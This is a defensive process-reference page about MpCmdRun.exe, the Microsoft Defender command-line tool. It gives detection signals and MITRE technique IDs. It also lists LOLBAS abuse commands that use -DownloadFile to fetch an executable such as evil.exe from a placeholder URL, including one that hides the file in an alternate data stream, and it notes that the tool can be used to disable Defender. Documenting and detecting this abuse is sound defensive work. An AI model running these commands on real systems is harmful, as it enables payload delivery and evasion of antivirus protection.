Process

unknown

mpcmdrun.exe

MpCmdRun.exe is the command-line interface to Microsoft Defender Antivirus, used to run scans, manage signatures, and configure protection. Administrators use it to drive Defender from scripts. Attackers abuse it to download files through a trusted binary and to turn protection off.

CategoryUtilityTagsmicrosoftcore-windowslolbin

File identity

File details

Not observed.

Signing information

Not observed.

File version0

Not observed.

File size0

Not observed.

Execution context

File paths0

Not observed.

User context0

Not observed.

Integrity level0

Not observed.

Instances0

Not observed.

Session0

Not observed.

Token privileges0

Not observed.

Ancestry

Parents0

Not observed.

Children0

Not observed.

Grandparents0

Not observed.

Grandchildren0

Not observed.

Behavior

Loaded modules0

Not observed.

Named pipes0

Not observed.

Process handles0

Not observed.

Command-line patterns0

Not observed.

LOLBAS3
  • MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}Download · Download file
  • copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exeDownload · Download file
  • MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exeADS · Hide downloaded data into an Alternate Data Stream

View LOLBAS entry

Indicators

Hashes

Not observed.

Analysis

About this process

MpCmdRun.exe (Microsoft Malware Protection Command Line Utility) controls Microsoft Defender Antivirus. It can start scans, update or roll back signatures, collect diagnostics, and restore quarantined items. Because Defender updates itself into versioned platform folders, the genuine binary lives under C:\ProgramData\Microsoft\Windows Defender\Platform\<version>\MpCmdRun.exe (and a copy under Program Files\Windows Defender), not in System32.

Legitimately, MpCmdRun is run by administrators and by Defender's own tooling. The action it performs is what gives an instance meaning, and a couple of those actions are useful to attackers.

Security notes

MpCmdRun.exe is a download proxy (T1105). Its -DownloadFile option fetches a file from a URL to a local path, so an attacker uses Defender's own signed tool to pull tooling onto the host under a name that security products are unlikely to flag. Watch for a MpCmdRun command line containing -DownloadFile and a URL, especially from an unusual parent.

It is also used to weaken Defender (T1685). MpCmdRun and the related configuration commands can remove signatures, disable scanning features, or restore quarantined files, blinding the very product it belongs to. Because the tool is legitimate, the action and the parent are what separate Defender administration from an attacker downloading payloads or switching protection off.

Anomaly signals5
  • Image path outside the Windows Defender Platform or Program Files locationshigh
  • -DownloadFile fetching a file from a URLhigh
  • Parent is an Office application, a script host, cmd.exe, or powershell.exehigh
  • Commands that disable scanning or remove definitionshigh
  • Outbound connections to hosts unrelated to Defender updatesmed

Telemetry

OS prevalence0

Not observed.

Observation timeline

Not observed.

References

Subsearch

Hasbeen seen inof mpcmdrun.exe?
Edit this page on GitHub